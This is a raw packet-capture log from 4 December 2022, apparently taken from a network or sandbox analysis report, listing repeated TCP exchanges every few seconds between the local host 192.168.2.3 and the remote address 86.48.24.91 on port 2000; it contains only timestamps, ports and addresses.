          Dec 4, 2022 22:25:32.290702105 CET497252000192.168.2.386.48.24.91
          Dec 4, 2022 22:25:32.302437067 CET20004972786.48.24.91192.168.2.3
          Dec 4, 2022 22:25:32.303288937 CET497272000192.168.2.386.48.24.91
          Dec 4, 2022 22:25:32.316740036 CET20004972886.48.24.91192.168.2.3
          Dec 4, 2022 22:25:32.325808048 CET497282000192.168.2.386.48.24.91
          Dec 4, 2022 22:25:32.341075897 CET20004972986.48.24.91192.168.2.3
          Dec 4, 2022 22:25:32.341785908 CET497292000192.168.2.386.48.24.91
          Dec 4, 2022 22:25:32.372730970 CET20004970886.48.24.91192.168.2.3
          Dec 4, 2022 22:25:32.382421017 CET20004970986.48.24.91192.168.2.3
          Dec 4, 2022 22:25:32.398511887 CET20004971186.48.24.91192.168.2.3
          Dec 4, 2022 22:25:32.410490990 CET20004972386.48.24.91192.168.2.3
          Dec 4, 2022 22:25:32.433595896 CET20004972586.48.24.91192.168.2.3
          Dec 4, 2022 22:25:32.445554018 CET20004972786.48.24.91192.168.2.3
          Dec 4, 2022 22:25:32.467521906 CET20004972886.48.24.91192.168.2.3
          Dec 4, 2022 22:25:32.485773087 CET20004972986.48.24.91192.168.2.3
          Dec 4, 2022 22:25:37.363322973 CET20004970886.48.24.91192.168.2.3
          Dec 4, 2022 22:25:37.377743006 CET20004970986.48.24.91192.168.2.3
          Dec 4, 2022 22:25:37.391076088 CET20004971186.48.24.91192.168.2.3
          Dec 4, 2022 22:25:37.403662920 CET20004972386.48.24.91192.168.2.3
          Dec 4, 2022 22:25:37.403842926 CET497082000192.168.2.386.48.24.91
          Dec 4, 2022 22:25:37.413916111 CET20004972586.48.24.91192.168.2.3
          Dec 4, 2022 22:25:37.417829037 CET497092000192.168.2.386.48.24.91
          Dec 4, 2022 22:25:37.422723055 CET20004972786.48.24.91192.168.2.3
          Dec 4, 2022 22:25:37.431055069 CET20004972886.48.24.91192.168.2.3
          Dec 4, 2022 22:25:37.431796074 CET497112000192.168.2.386.48.24.91
          Dec 4, 2022 22:25:37.439685106 CET20004972986.48.24.91192.168.2.3
          Dec 4, 2022 22:25:37.443793058 CET497232000192.168.2.386.48.24.91
          Dec 4, 2022 22:25:37.453851938 CET497252000192.168.2.386.48.24.91
          Dec 4, 2022 22:25:37.462838888 CET497272000192.168.2.386.48.24.91
          Dec 4, 2022 22:25:37.471885920 CET497282000192.168.2.386.48.24.91
          Dec 4, 2022 22:25:37.480843067 CET497292000192.168.2.386.48.24.91
          Dec 4, 2022 22:25:38.412944078 CET497282000192.168.2.386.48.24.91
          Dec 4, 2022 22:25:38.413517952 CET497232000192.168.2.386.48.24.91
          Dec 4, 2022 22:25:38.414058924 CET497252000192.168.2.386.48.24.91
          Dec 4, 2022 22:25:38.414539099 CET497092000192.168.2.386.48.24.91
          Dec 4, 2022 22:25:38.415054083 CET497292000192.168.2.386.48.24.91
          Dec 4, 2022 22:25:38.415565968 CET497272000192.168.2.386.48.24.91
          Dec 4, 2022 22:25:38.416121006 CET497112000192.168.2.386.48.24.91
          Dec 4, 2022 22:25:38.417263031 CET497082000192.168.2.386.48.24.91
          Dec 4, 2022 22:25:38.557297945 CET20004972886.48.24.91192.168.2.3
          Dec 4, 2022 22:25:38.557354927 CET20004972386.48.24.91192.168.2.3
          Dec 4, 2022 22:25:38.557387114 CET20004970986.48.24.91192.168.2.3
          Dec 4, 2022 22:25:38.557420015 CET20004972586.48.24.91192.168.2.3
          Dec 4, 2022 22:25:38.559212923 CET20004972986.48.24.91192.168.2.3
          Dec 4, 2022 22:25:38.559261084 CET20004971186.48.24.91192.168.2.3
          Dec 4, 2022 22:25:38.559295893 CET20004972786.48.24.91192.168.2.3
          Dec 4, 2022 22:25:38.560467005 CET20004970886.48.24.91192.168.2.3
          Dec 4, 2022 22:25:42.449033022 CET20004970886.48.24.91192.168.2.3
          Dec 4, 2022 22:25:42.454952002 CET497082000192.168.2.386.48.24.91
          Dec 4, 2022 22:25:42.460655928 CET20004970986.48.24.91192.168.2.3
          Dec 4, 2022 22:25:42.469897032 CET20004971186.48.24.91192.168.2.3
          Dec 4, 2022 22:25:42.474838972 CET497112000192.168.2.386.48.24.91
          Dec 4, 2022 22:25:42.474891901 CET497092000192.168.2.386.48.24.91
          Dec 4, 2022 22:25:42.477978945 CET20004972386.48.24.91192.168.2.3
          Dec 4, 2022 22:25:42.479275942 CET497232000192.168.2.386.48.24.91
          Dec 4, 2022 22:25:42.487710953 CET20004972586.48.24.91192.168.2.3
          Dec 4, 2022 22:25:42.488810062 CET497252000192.168.2.386.48.24.91
          Dec 4, 2022 22:25:42.495908976 CET20004972786.48.24.91192.168.2.3
          Dec 4, 2022 22:25:42.497232914 CET497272000192.168.2.386.48.24.91
          Dec 4, 2022 22:25:42.503326893 CET20004972886.48.24.91192.168.2.3
          Dec 4, 2022 22:25:42.508598089 CET497282000192.168.2.386.48.24.91
          Dec 4, 2022 22:25:42.511126995 CET20004972986.48.24.91192.168.2.3
          Dec 4, 2022 22:25:42.512443066 CET497292000192.168.2.386.48.24.91
          Dec 4, 2022 22:25:42.598601103 CET20004970886.48.24.91192.168.2.3
          Dec 4, 2022 22:25:42.618499994 CET20004970986.48.24.91192.168.2.3
          Dec 4, 2022 22:25:42.618598938 CET20004971186.48.24.91192.168.2.3
          Dec 4, 2022 22:25:42.621496916 CET20004972386.48.24.91192.168.2.3
          Dec 4, 2022 22:25:42.631876945 CET20004972586.48.24.91192.168.2.3
          Dec 4, 2022 22:25:42.639334917 CET20004972786.48.24.91192.168.2.3
          Dec 4, 2022 22:25:42.650768042 CET20004972886.48.24.91192.168.2.3
          Dec 4, 2022 22:25:42.655632019 CET20004972986.48.24.91192.168.2.3
          Dec 4, 2022 22:25:47.525525093 CET20004970886.48.24.91192.168.2.3
          Dec 4, 2022 22:25:47.531007051 CET497082000192.168.2.386.48.24.91
          Dec 4, 2022 22:25:47.541533947 CET20004970986.48.24.91192.168.2.3
          Dec 4, 2022 22:25:47.547086000 CET497092000192.168.2.386.48.24.91
          Dec 4, 2022 22:25:47.560956955 CET20004971186.48.24.91192.168.2.3
          Dec 4, 2022 22:25:47.574573994 CET20004972386.48.24.91192.168.2.3
          Dec 4, 2022 22:25:47.575084925 CET497232000192.168.2.386.48.24.91
          Dec 4, 2022 22:25:47.583154917 CET20004972586.48.24.91192.168.2.3
          Dec 4, 2022 22:25:47.583684921 CET497252000192.168.2.386.48.24.91
          Dec 4, 2022 22:25:47.592699051 CET20004972786.48.24.91192.168.2.3
          Dec 4, 2022 22:25:47.593195915 CET497272000192.168.2.386.48.24.91
          Dec 4, 2022 22:25:47.600857973 CET497112000192.168.2.386.48.24.91
          Dec 4, 2022 22:25:47.603322029 CET20004972886.48.24.91192.168.2.3
          Dec 4, 2022 22:25:47.603827000 CET497282000192.168.2.386.48.24.91
          Dec 4, 2022 22:25:47.616087914 CET20004972986.48.24.91192.168.2.3
          Dec 4, 2022 22:25:47.616626978 CET497292000192.168.2.386.48.24.91
          Dec 4, 2022 22:25:47.677531004 CET20004970886.48.24.91192.168.2.3
          Dec 4, 2022 22:25:47.691286087 CET20004970986.48.24.91192.168.2.3
          Dec 4, 2022 22:25:47.719340086 CET20004972386.48.24.91192.168.2.3
          Dec 4, 2022 22:25:47.726901054 CET20004972586.48.24.91192.168.2.3
          Dec 4, 2022 22:25:47.735455990 CET20004972786.48.24.91192.168.2.3
          Dec 4, 2022 22:25:47.747920036 CET20004972886.48.24.91192.168.2.3
          Dec 4, 2022 22:25:47.760678053 CET20004972986.48.24.91192.168.2.3
          Dec 4, 2022 22:25:48.079356909 CET497112000192.168.2.386.48.24.91
          Dec 4, 2022 22:25:48.228348970 CET20004971186.48.24.91192.168.2.3
          Dec 4, 2022 22:25:52.628806114 CET20004970886.48.24.91192.168.2.3
          Dec 4, 2022 22:25:52.638959885 CET497082000192.168.2.386.48.24.91
          Dec 4, 2022 22:25:52.640122890 CET20004970986.48.24.91192.168.2.3
          Dec 4, 2022 22:25:52.641330957 CET497092000192.168.2.386.48.24.91
          Dec 4, 2022 22:25:52.648663044 CET20004971186.48.24.91192.168.2.3
          Dec 4, 2022 22:25:52.649971962 CET497112000192.168.2.386.48.24.91
          Dec 4, 2022 22:25:52.655317068 CET20004972386.48.24.91192.168.2.3
          Dec 4, 2022 22:25:52.656600952 CET497232000192.168.2.386.48.24.91
          Dec 4, 2022 22:25:52.662401915 CET20004972586.48.24.91192.168.2.3
          Dec 4, 2022 22:25:52.667603016 CET497252000192.168.2.386.48.24.91
          Dec 4, 2022 22:25:52.669698000 CET20004972786.48.24.91192.168.2.3
          Dec 4, 2022 22:25:52.671627045 CET497272000192.168.2.386.48.24.91
          Dec 4, 2022 22:25:52.677138090 CET20004972886.48.24.91192.168.2.3
          Dec 4, 2022 22:25:52.680732012 CET497282000192.168.2.386.48.24.91
          Dec 4, 2022 22:25:52.684097052 CET20004972986.48.24.91192.168.2.3
          Dec 4, 2022 22:25:52.690481901 CET497292000192.168.2.386.48.24.91
          Dec 4, 2022 22:25:52.781277895 CET20004970886.48.24.91192.168.2.3
          Dec 4, 2022 22:25:52.783986092 CET20004970986.48.24.91192.168.2.3
          Dec 4, 2022 22:25:52.792115927 CET20004971186.48.24.91192.168.2.3
          Dec 4, 2022 22:25:52.799098015 CET20004972386.48.24.91192.168.2.3
          Dec 4, 2022 22:25:52.810411930 CET20004972586.48.24.91192.168.2.3
          Dec 4, 2022 22:25:52.814908981 CET20004972786.48.24.91192.168.2.3
          Dec 4, 2022 22:25:52.824130058 CET20004972886.48.24.91192.168.2.3
          Dec 4, 2022 22:25:52.833960056 CET20004972986.48.24.91192.168.2.3
          Dec 4, 2022 22:25:57.693836927 CET20004970886.48.24.91192.168.2.3
          Dec 4, 2022 22:25:57.707029104 CET497082000192.168.2.386.48.24.91
          Dec 4, 2022 22:25:57.715743065 CET20004970986.48.24.91192.168.2.3
          Dec 4, 2022 22:25:57.716253996 CET497092000192.168.2.386.48.24.91
          Dec 4, 2022 22:25:57.734215021 CET20004971186.48.24.91192.168.2.3
          Dec 4, 2022 22:25:57.735022068 CET497112000192.168.2.386.48.24.91
          Dec 4, 2022 22:25:57.748670101 CET20004972386.48.24.91192.168.2.3
          Dec 4, 2022 22:25:57.749299049 CET497232000192.168.2.386.48.24.91
          Dec 4, 2022 22:25:57.761857986 CET20004972586.48.24.91192.168.2.3
          Dec 4, 2022 22:25:57.762501001 CET497252000192.168.2.386.48.24.91
          Dec 4, 2022 22:25:57.776676893 CET20004972786.48.24.91192.168.2.3
          Dec 4, 2022 22:25:57.777328968 CET497272000192.168.2.386.48.24.91
          Dec 4, 2022 22:25:57.790997982 CET20004972886.48.24.91192.168.2.3
          Dec 4, 2022 22:25:57.791490078 CET497282000192.168.2.386.48.24.91
          Dec 4, 2022 22:25:57.805672884 CET20004972986.48.24.91192.168.2.3
          Dec 4, 2022 22:25:57.806220055 CET497292000192.168.2.386.48.24.91
          Dec 4, 2022 22:25:57.857348919 CET20004970886.48.24.91192.168.2.3
          Dec 4, 2022 22:25:57.858998060 CET20004970986.48.24.91192.168.2.3
          Dec 4, 2022 22:25:57.878319979 CET20004971186.48.24.91192.168.2.3
          Dec 4, 2022 22:25:57.893254995 CET20004972386.48.24.91192.168.2.3
          Dec 4, 2022 22:25:57.906146049 CET20004972586.48.24.91192.168.2.3
          Dec 4, 2022 22:25:57.921227932 CET20004972786.48.24.91192.168.2.3
          Dec 4, 2022 22:25:57.935318947 CET20004972886.48.24.91192.168.2.3
          Dec 4, 2022 22:25:57.949996948 CET20004972986.48.24.91192.168.2.3
          Dec 4, 2022 22:26:02.818569899 CET20004970886.48.24.91192.168.2.3
          Dec 4, 2022 22:26:02.824146986 CET497082000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:02.835071087 CET20004970986.48.24.91192.168.2.3
          Dec 4, 2022 22:26:02.836275101 CET497092000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:02.858447075 CET20004971186.48.24.91192.168.2.3
          Dec 4, 2022 22:26:02.862420082 CET497112000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:02.869478941 CET20004972386.48.24.91192.168.2.3
          Dec 4, 2022 22:26:02.874403000 CET497232000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:02.877819061 CET20004972586.48.24.91192.168.2.3
          Dec 4, 2022 22:26:02.881973982 CET497252000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:02.888412952 CET20004972786.48.24.91192.168.2.3
          Dec 4, 2022 22:26:02.889739037 CET497272000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:02.894530058 CET20004972886.48.24.91192.168.2.3
          Dec 4, 2022 22:26:02.898303986 CET497282000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:02.904089928 CET20004972986.48.24.91192.168.2.3
          Dec 4, 2022 22:26:02.904561996 CET497292000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:02.968065023 CET20004970886.48.24.91192.168.2.3
          Dec 4, 2022 22:26:02.993810892 CET20004970986.48.24.91192.168.2.3
          Dec 4, 2022 22:26:03.005022049 CET20004971186.48.24.91192.168.2.3
          Dec 4, 2022 22:26:03.017959118 CET20004972386.48.24.91192.168.2.3
          Dec 4, 2022 22:26:03.024012089 CET20004972586.48.24.91192.168.2.3
          Dec 4, 2022 22:26:03.034156084 CET20004972786.48.24.91192.168.2.3
          Dec 4, 2022 22:26:03.041969061 CET20004972886.48.24.91192.168.2.3
          Dec 4, 2022 22:26:03.049119949 CET20004972986.48.24.91192.168.2.3
          Dec 4, 2022 22:26:07.914453030 CET20004970886.48.24.91192.168.2.3
          Dec 4, 2022 22:26:07.924684048 CET497082000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:07.924921036 CET20004970986.48.24.91192.168.2.3
          Dec 4, 2022 22:26:07.926146984 CET497092000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:07.938096046 CET20004971186.48.24.91192.168.2.3
          Dec 4, 2022 22:26:07.938749075 CET497112000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:07.946332932 CET20004972386.48.24.91192.168.2.3
          Dec 4, 2022 22:26:07.946928024 CET497232000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:07.955178022 CET20004972586.48.24.91192.168.2.3
          Dec 4, 2022 22:26:07.955826998 CET497252000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:07.963424921 CET20004972786.48.24.91192.168.2.3
          Dec 4, 2022 22:26:07.964541912 CET497272000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:07.971811056 CET20004972886.48.24.91192.168.2.3
          Dec 4, 2022 22:26:07.972445011 CET497282000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:07.977808952 CET20004972986.48.24.91192.168.2.3
          Dec 4, 2022 22:26:07.978414059 CET497292000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:08.067065001 CET20004970886.48.24.91192.168.2.3
          Dec 4, 2022 22:26:08.067517996 CET20004970986.48.24.91192.168.2.3
          Dec 4, 2022 22:26:08.080975056 CET20004971186.48.24.91192.168.2.3
          Dec 4, 2022 22:26:08.089926004 CET20004972386.48.24.91192.168.2.3
          Dec 4, 2022 22:26:08.097848892 CET20004972586.48.24.91192.168.2.3
          Dec 4, 2022 22:26:08.106607914 CET20004972786.48.24.91192.168.2.3
          Dec 4, 2022 22:26:08.115839005 CET20004972886.48.24.91192.168.2.3
          Dec 4, 2022 22:26:08.121691942 CET20004972986.48.24.91192.168.2.3
          Dec 4, 2022 22:26:12.987370014 CET20004970886.48.24.91192.168.2.3
          Dec 4, 2022 22:26:13.007189989 CET497082000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:13.013099909 CET20004970986.48.24.91192.168.2.3
          Dec 4, 2022 22:26:13.018352032 CET497092000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:13.031553030 CET20004971186.48.24.91192.168.2.3
          Dec 4, 2022 22:26:13.044203997 CET20004972386.48.24.91192.168.2.3
          Dec 4, 2022 22:26:13.058490038 CET20004972586.48.24.91192.168.2.3
          Dec 4, 2022 22:26:13.059659004 CET20004972786.48.24.91192.168.2.3
          Dec 4, 2022 22:26:13.072983980 CET20004972886.48.24.91192.168.2.3
          Dec 4, 2022 22:26:13.073018074 CET497112000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:13.084495068 CET497232000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:13.091202021 CET20004972986.48.24.91192.168.2.3
          Dec 4, 2022 22:26:13.098459959 CET497232000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:13.099390984 CET497252000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:13.101011992 CET497272000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:13.107009888 CET497252000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:13.110877037 CET497272000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:13.111449003 CET497282000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:13.131481886 CET497292000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:13.152288914 CET20004970886.48.24.91192.168.2.3
          Dec 4, 2022 22:26:13.153079987 CET497292000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:13.162693977 CET20004970986.48.24.91192.168.2.3
          Dec 4, 2022 22:26:13.194663048 CET497112000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:13.241813898 CET20004972386.48.24.91192.168.2.3
          Dec 4, 2022 22:26:13.250843048 CET20004972586.48.24.91192.168.2.3
          Dec 4, 2022 22:26:13.254682064 CET20004972886.48.24.91192.168.2.3
          Dec 4, 2022 22:26:13.255371094 CET20004972786.48.24.91192.168.2.3
          Dec 4, 2022 22:26:13.295809984 CET20004972986.48.24.91192.168.2.3
          Dec 4, 2022 22:26:13.336775064 CET20004971186.48.24.91192.168.2.3
          Dec 4, 2022 22:26:18.107250929 CET20004970886.48.24.91192.168.2.3
          Dec 4, 2022 22:26:18.124686003 CET497082000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:18.125926018 CET20004970986.48.24.91192.168.2.3
          Dec 4, 2022 22:26:18.126553059 CET497092000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:18.135474920 CET20004971186.48.24.91192.168.2.3
          Dec 4, 2022 22:26:18.136058092 CET497112000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:18.145483017 CET20004972386.48.24.91192.168.2.3
          Dec 4, 2022 22:26:18.151393890 CET497232000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:18.172909021 CET20004972586.48.24.91192.168.2.3
          Dec 4, 2022 22:26:18.173703909 CET497252000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:18.182188034 CET20004972786.48.24.91192.168.2.3
          Dec 4, 2022 22:26:18.183319092 CET497272000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:18.192050934 CET20004972886.48.24.91192.168.2.3
          Dec 4, 2022 22:26:18.193327904 CET497282000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:18.205116034 CET20004972986.48.24.91192.168.2.3
          Dec 4, 2022 22:26:18.205863953 CET497292000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:18.268831015 CET20004970986.48.24.91192.168.2.3
          Dec 4, 2022 22:26:18.268889904 CET20004970886.48.24.91192.168.2.3
          Dec 4, 2022 22:26:18.279647112 CET20004971186.48.24.91192.168.2.3
          Dec 4, 2022 22:26:18.294935942 CET20004972386.48.24.91192.168.2.3
          Dec 4, 2022 22:26:18.315995932 CET20004972586.48.24.91192.168.2.3
          Dec 4, 2022 22:26:18.325501919 CET20004972786.48.24.91192.168.2.3
          Dec 4, 2022 22:26:18.336920977 CET20004972886.48.24.91192.168.2.3
          Dec 4, 2022 22:26:18.347579956 CET20004972986.48.24.91192.168.2.3
          Dec 4, 2022 22:26:23.222404957 CET20004970886.48.24.91192.168.2.3
          Dec 4, 2022 22:26:23.232777119 CET497082000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:23.234402895 CET20004970986.48.24.91192.168.2.3
          Dec 4, 2022 22:26:23.234970093 CET497092000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:23.246304035 CET20004971186.48.24.91192.168.2.3
          Dec 4, 2022 22:26:23.246926069 CET497112000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:23.257534981 CET20004972386.48.24.91192.168.2.3
          Dec 4, 2022 22:26:23.258232117 CET497232000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:23.270909071 CET20004972586.48.24.91192.168.2.3
          Dec 4, 2022 22:26:23.273387909 CET497252000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:23.284275055 CET20004972786.48.24.91192.168.2.3
          Dec 4, 2022 22:26:23.284813881 CET497272000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:23.298357964 CET20004972886.48.24.91192.168.2.3
          Dec 4, 2022 22:26:23.299034119 CET497282000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:23.311814070 CET20004972986.48.24.91192.168.2.3
          Dec 4, 2022 22:26:23.312349081 CET497292000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:23.377423048 CET20004970986.48.24.91192.168.2.3
          Dec 4, 2022 22:26:23.379612923 CET20004970886.48.24.91192.168.2.3
          Dec 4, 2022 22:26:23.390397072 CET20004971186.48.24.91192.168.2.3
          Dec 4, 2022 22:26:23.402509928 CET20004972386.48.24.91192.168.2.3
          Dec 4, 2022 22:26:23.417815924 CET20004972586.48.24.91192.168.2.3
          Dec 4, 2022 22:26:23.427460909 CET20004972786.48.24.91192.168.2.3
          Dec 4, 2022 22:26:23.442569017 CET20004972886.48.24.91192.168.2.3
          Dec 4, 2022 22:26:23.455528021 CET20004972986.48.24.91192.168.2.3
          Dec 4, 2022 22:26:28.323340893 CET20004970886.48.24.91192.168.2.3
          Dec 4, 2022 22:26:28.325031996 CET497082000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:28.341475010 CET20004970986.48.24.91192.168.2.3
          Dec 4, 2022 22:26:28.345905066 CET497092000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:28.353244066 CET20004971186.48.24.91192.168.2.3
          Dec 4, 2022 22:26:28.354579926 CET497112000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:28.364258051 CET20004972386.48.24.91192.168.2.3
          Dec 4, 2022 22:26:28.365197897 CET497232000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:28.375298977 CET20004972586.48.24.91192.168.2.3
          Dec 4, 2022 22:26:28.376943111 CET497252000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:28.386862993 CET20004972786.48.24.91192.168.2.3
          Dec 4, 2022 22:26:28.391385078 CET497272000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:28.401990891 CET20004972886.48.24.91192.168.2.3
          Dec 4, 2022 22:26:28.404103994 CET497282000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:28.421735048 CET20004972986.48.24.91192.168.2.3
          Dec 4, 2022 22:26:28.423191071 CET497292000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:28.469588041 CET20004970886.48.24.91192.168.2.3
          Dec 4, 2022 22:26:28.489353895 CET20004970986.48.24.91192.168.2.3
          Dec 4, 2022 22:26:28.496329069 CET20004971186.48.24.91192.168.2.3
          Dec 4, 2022 22:26:28.508439064 CET20004972386.48.24.91192.168.2.3
          Dec 4, 2022 22:26:28.522674084 CET20004972586.48.24.91192.168.2.3
          Dec 4, 2022 22:26:28.534275055 CET20004972786.48.24.91192.168.2.3
          Dec 4, 2022 22:26:28.546477079 CET20004972886.48.24.91192.168.2.3
          Dec 4, 2022 22:26:28.566313982 CET20004972986.48.24.91192.168.2.3
          Dec 4, 2022 22:26:33.440293074 CET20004970886.48.24.91192.168.2.3
          Dec 4, 2022 22:26:33.473651886 CET20004970986.48.24.91192.168.2.3
          Dec 4, 2022 22:26:33.482098103 CET497082000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:33.484579086 CET20004971186.48.24.91192.168.2.3
          Dec 4, 2022 22:26:33.493621111 CET20004972386.48.24.91192.168.2.3
          Dec 4, 2022 22:26:33.503727913 CET20004972586.48.24.91192.168.2.3
          Dec 4, 2022 22:26:33.513837099 CET20004972786.48.24.91192.168.2.3
          Dec 4, 2022 22:26:33.515093088 CET497092000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:33.525209904 CET497112000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:33.527079105 CET20004972886.48.24.91192.168.2.3
          Dec 4, 2022 22:26:33.533593893 CET497232000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:33.537231922 CET20004972986.48.24.91192.168.2.3
          Dec 4, 2022 22:26:33.544038057 CET497252000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:33.554040909 CET497272000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:33.569050074 CET497282000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:33.579046011 CET497292000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:34.172322035 CET497232000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:34.173449993 CET497252000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:34.174537897 CET497092000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:34.175148964 CET497292000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:34.175623894 CET497272000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:34.176104069 CET497112000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:34.176558971 CET497282000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:34.185292959 CET497082000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:34.315890074 CET20004972386.48.24.91192.168.2.3
          Dec 4, 2022 22:26:34.315948009 CET20004972586.48.24.91192.168.2.3
          Dec 4, 2022 22:26:34.317274094 CET20004970986.48.24.91192.168.2.3
          Dec 4, 2022 22:26:34.318068027 CET20004972786.48.24.91192.168.2.3
          Dec 4, 2022 22:26:34.318103075 CET20004972986.48.24.91192.168.2.3
          Dec 4, 2022 22:26:34.318583012 CET20004972886.48.24.91192.168.2.3
          Dec 4, 2022 22:26:34.318614960 CET20004971186.48.24.91192.168.2.3
          Dec 4, 2022 22:26:34.328289032 CET20004970886.48.24.91192.168.2.3
          Dec 4, 2022 22:26:38.546224117 CET20004970886.48.24.91192.168.2.3
          Dec 4, 2022 22:26:38.548988104 CET497082000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:38.561518908 CET20004970986.48.24.91192.168.2.3
          Dec 4, 2022 22:26:38.571039915 CET497092000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:38.572277069 CET20004971186.48.24.91192.168.2.3
          Dec 4, 2022 22:26:38.572730064 CET497112000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:38.584489107 CET20004972386.48.24.91192.168.2.3
          Dec 4, 2022 22:26:38.584994078 CET497232000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:38.600507975 CET20004972586.48.24.91192.168.2.3
          Dec 4, 2022 22:26:38.601015091 CET497252000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:38.609491110 CET20004972786.48.24.91192.168.2.3
          Dec 4, 2022 22:26:38.610038996 CET497272000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:38.618280888 CET20004972886.48.24.91192.168.2.3
          Dec 4, 2022 22:26:38.621632099 CET497282000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:38.631371021 CET20004972986.48.24.91192.168.2.3
          Dec 4, 2022 22:26:38.632000923 CET497292000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:38.692847013 CET20004970886.48.24.91192.168.2.3
          Dec 4, 2022 22:26:38.715095043 CET20004970986.48.24.91192.168.2.3
          Dec 4, 2022 22:26:38.716988087 CET20004971186.48.24.91192.168.2.3
          Dec 4, 2022 22:26:38.729069948 CET20004972386.48.24.91192.168.2.3
          Dec 4, 2022 22:26:38.745395899 CET20004972586.48.24.91192.168.2.3
          Dec 4, 2022 22:26:38.753892899 CET20004972786.48.24.91192.168.2.3
          Dec 4, 2022 22:26:38.766123056 CET20004972886.48.24.91192.168.2.3
          Dec 4, 2022 22:26:38.776844978 CET20004972986.48.24.91192.168.2.3
          Dec 4, 2022 22:26:43.642699957 CET20004970886.48.24.91192.168.2.3
          Dec 4, 2022 22:26:43.648742914 CET497082000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:43.654737949 CET20004970986.48.24.91192.168.2.3
          Dec 4, 2022 22:26:43.655534983 CET497092000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:43.666400909 CET20004971186.48.24.91192.168.2.3
          Dec 4, 2022 22:26:43.667526960 CET497112000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:43.674433947 CET20004972386.48.24.91192.168.2.3
          Dec 4, 2022 22:26:43.675467968 CET497232000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:43.681756020 CET20004972586.48.24.91192.168.2.3
          Dec 4, 2022 22:26:43.685540915 CET497252000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:43.688985109 CET20004972786.48.24.91192.168.2.3
          Dec 4, 2022 22:26:43.690057039 CET497272000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:43.699258089 CET20004972886.48.24.91192.168.2.3
          Dec 4, 2022 22:26:43.700622082 CET497282000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:43.708914995 CET20004972986.48.24.91192.168.2.3
          Dec 4, 2022 22:26:43.710304976 CET497292000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:43.792381048 CET20004970886.48.24.91192.168.2.3
          Dec 4, 2022 22:26:43.798846960 CET20004970986.48.24.91192.168.2.3
          Dec 4, 2022 22:26:43.811096907 CET20004971186.48.24.91192.168.2.3
          Dec 4, 2022 22:26:43.821022987 CET20004972386.48.24.91192.168.2.3
